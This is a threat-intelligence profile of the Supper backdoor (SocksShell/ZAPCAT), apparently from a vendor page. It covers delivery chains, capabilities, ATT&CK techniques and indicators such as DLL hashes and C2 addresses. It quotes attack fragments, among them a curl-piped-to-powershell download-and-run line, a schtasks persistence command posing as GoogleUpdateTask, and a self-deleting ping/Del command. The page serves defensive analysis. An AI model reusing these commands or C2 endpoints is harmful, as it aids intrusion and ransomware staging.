Supper
Supper is a backdoor malware family, also referred to in the provided reporting as SocksShell and ZAPCAT, that is used to provide remote access to compromised Windows systems and supports SOCKS5 proxying. Multiple reports describe it as a pre-ransomware backdoor frequently deployed after initial access, including after GootLoader/Storm-0494 intrusions and in ClickFix/Fake CAPTCHA infection chains. It has been associated in the content with the financially motivated threat actor Vanilla Tempest (previously tracked as DEV-0832 and Vice Society), and reporting links its use to intrusions that later deployed ransomware including INC and, more broadly, Rhysida, BlackCat, Zeppelin, and Quantum Locker in related Vanilla Tempest operations.
Observed delivery and infection vectors in the content include deployment after GootLoader infections obtained through SEO poisoning and compromised WordPress sites, manual execution of malicious PowerShell from ClickFix/Fake CAPTCHA lures, and delivery by the pkr_mtsi packer via malvertising and fake software download sites. In one investigated Polish incident, two DLLs identified as Supper (245282244.dll, SHA-256 2528df60e55f210a6396dd7740d76afe30d5e9e8684a5b8a02a63bdcb5041bfc; and 760468301.dll, SHA-256 21b953dc06933a69bcb2e0ea2839b47288fc8f577e183c95a13fc3905061b4e6) were found under a user AppData\Local path, exported DllRegisterServer, and were assessed as part of the Supper family.
Capabilities directly described in the content include remote control of infected devices, SOCKS5 proxy setup/disconnection, shell execution, self-deletion, and use as a proxy to map internal networks and support lateral movement and data exfiltration. Reporting states Supper established persistence via a scheduled task named GoogleUpdateTask created with schtasks.exe using a minute-based trigger. Its command-and-control protocol is described as custom-encrypted and structured, with multiple buffers and a format used to process commands; one report states outbound messages used a custom XOR scheme with a new 4-byte key per message header. Additional tradecraft attributed to observed Supper variants includes API hammering, API hashing, runtime shellcode construction/reconstruction, hash-based DLL resolution, custom LZMA decompression, and custom encryption.
The content places Supper in intrusions affecting enterprise environments, including U.S. healthcare organizations and a large Polish organization. In Microsoft-reported healthcare intrusions, attackers used Supper alongside legitimate AnyDesk and MEGA tools, with lateral movement via RDP and WMI Provider Host before deploying INC ransomware. Huntress reporting describes rapid post-compromise activity in GootLoader-linked cases, including deployment of multiple Supper instances, WinRM-based lateral movement to domain controllers, creation of new admin users, and reconnaissance consistent with pre-ransomware operations.
High-confidence indicators mentioned in the content include the DLL hashes above and hardcoded or learned C2 endpoints 162.19.199.110:4043, 146.19.49.130:8080, 185.233.166.27:443, and 85.239.54.130.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Once inside, the attackers backdoored the systems with Supper malware and deployed the legitimate AnyDesk remote monitoring and MEGA data synchronization tools.
Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.
X-Force links the group to malware developers/operators such as Broomstick, Supper, PortStarter, SystemBC, and Rhysida ransomware...
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
4 techniques"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
"...copying a specific PowerShell script and executing it manually via the Windows Run dialog..."; "the initial PowerShell command retrieves a malicious payload from a remote domain"
Multiple strings: "C:\Windows\System32\cmd.exe"; commands like "/c systeminfo", "/c ipconfig /all", and Supper: "cmd.exe /C ping 1.1.1.1 ... & Del /f /q \"%s\""
"cmd /c curl naintn.com/... | powershell" ... "Fake CAPTCHA (ClickFix) attack... convince the victim to copy a malicious snippet, and execute it using the Win+R shortcut."
Persistence
2 techniques"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
Privilege Escalation
2 techniques"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
Stealth
1 technique"sample was obfuscated using an unidentified obfuscator"; "implement string decryption routines"; "packed with the same packer"; "custom algorithm" encrypting C2 data
Command and Control
4 techniques"The ability to proxy traffic through the infected machine allows threat actors to map the internal network stealthily"
"Other supported commands include, at minimum, a SOCKS proxy feature"; YARA strings include "bad socks5 request" and "Starting Init SOCKS"
"cmd /c curl naintn.com/... | powershell"
Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.
Recent activity
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a secondary payload family used post-compromise; associated with C2 infrastructure and described as supporting data exfiltration/lateral movement and potential ransomware deployment in the campaign.
Supper is a Windows malware family used for persistence and remote control. In this incident it established persistence via a scheduled task, communicated with hardcoded/updated C2 IP:port infrastructure using a custom encrypted protocol (XOR 'M' header + custom stream-like cipher), supported at least C2 server list updates, a SOCKS proxy feature, and execution of custom binaries delivered from C2 (suggesting a loader/backdoor role commonly used ahead of follow-on payloads, including ransomware).
Supper is a malware family delivered via the pkr_mtsi packer; specific functionality is not detailed in the content.
A malware family delivered by the pkr_mtsi packer. Specific functionality is not detailed in the content.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.